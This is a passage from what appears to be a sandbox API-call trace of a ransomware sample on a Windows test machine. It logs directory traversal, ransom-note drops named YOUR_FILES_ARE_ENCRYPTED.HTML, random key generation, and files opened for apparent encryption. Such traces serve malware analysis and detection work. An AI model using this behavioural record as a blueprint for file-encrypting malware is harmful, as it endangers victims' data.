dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 0 [0116.600] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.600] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 138 [0116.600] GetProcessHeap () returned 0x600000 [0116.600] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.601] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.602] CloseHandle (hObject=0x320) returned 1 [0116.603] GetProcessHeap () returned 0x600000 [0116.603] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.603] GetProcessHeap () returned 0x600000 [0116.603] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.603] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.603] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.603] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState") returned 110 [0116.603] GetProcessHeap () returned 0x600000 [0116.603] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.603] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState" [0116.603] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState\\*" [0116.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0116.603] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.603] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7c8d0a7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7c8d0a7, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 0 [0116.603] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0116.604] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.604] GetProcessHeap () returned 0x600000 [0116.604] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.604] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.604] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.605] CloseHandle (hObject=0x320) returned 1 [0116.606] GetProcessHeap () returned 0x600000 [0116.606] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.606] GetProcessHeap () returned 0x600000 [0116.606] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.606] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d4ba95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.606] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.607] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings") returned 106 [0116.607] GetProcessHeap () returned 0x600000 [0116.607] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.607] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings" [0116.608] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\*" [0116.608] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7f87f1c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0116.609] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7f87f1c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.609] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7d4ba95, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d4ba95, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d4ba95, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.609] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.609] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 119 [0116.609] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.609] lstrlenW (lpString=".lock") returned 5 [0116.609] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.609] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8046aa7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.609] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.610] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat") returned 119 [0116.610] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.610] lstrlenW (lpString=".dat") returned 4 [0116.610] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.610] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0116.610] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.610] GetProcessHeap () returned 0x600000 [0116.610] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.613] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="6B") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="0A") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="40") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="95") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="BA") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="B5") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="17") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="CC") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="FF") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D6") returned 2 [0116.613] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="A6") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="83") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E8") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="55") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="83") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A8") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="8F") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="42") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="EA") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="8C") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="27") returned 2 [0116.614] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="83") returned 2 [0116.614] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="76") returned 2 [0116.614] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="D0") returned 2 [0116.614] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="28") returned 2 [0116.614] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="E0") returned 2 [0116.614] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E7") returned 2 [0116.614] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="6A") returned 2 [0116.614] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="1B") returned 2 [0116.614] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="C2") returned 2 [0116.614] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="66") returned 2 [0116.614] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="36") returned 2 [0116.614] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat" [0116.615] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.615] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.615] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf7f87f1c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7f87f1c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7f87f1c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.615] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.615] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 124 [0116.615] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.615] lstrlenW (lpString=".LOG1") returned 5 [0116.615] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.615] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf7f87f1c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7f87f1c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7f87f1c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.615] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.615] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 124 [0116.615] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.615] lstrlenW (lpString=".LOG2") returned 5 [0116.615] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.615] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf7f87f1c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7f87f1c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7f87f1c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.615] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0116.615] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 136 [0116.615] GetProcessHeap () returned 0x600000 [0116.615] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.615] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.616] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.617] CloseHandle (hObject=0x320) returned 1 [0116.617] GetProcessHeap () returned 0x600000 [0116.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.617] GetProcessHeap () returned 0x600000 [0116.617] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.618] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.618] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.618] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData") returned 111 [0116.618] GetProcessHeap () returned 0x600000 [0116.618] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.618] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData" [0116.618] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData\\*" [0116.619] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.619] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.619] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7cb3052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7cb3052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7cb3052, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 0 [0116.619] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.619] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0116.619] GetProcessHeap () returned 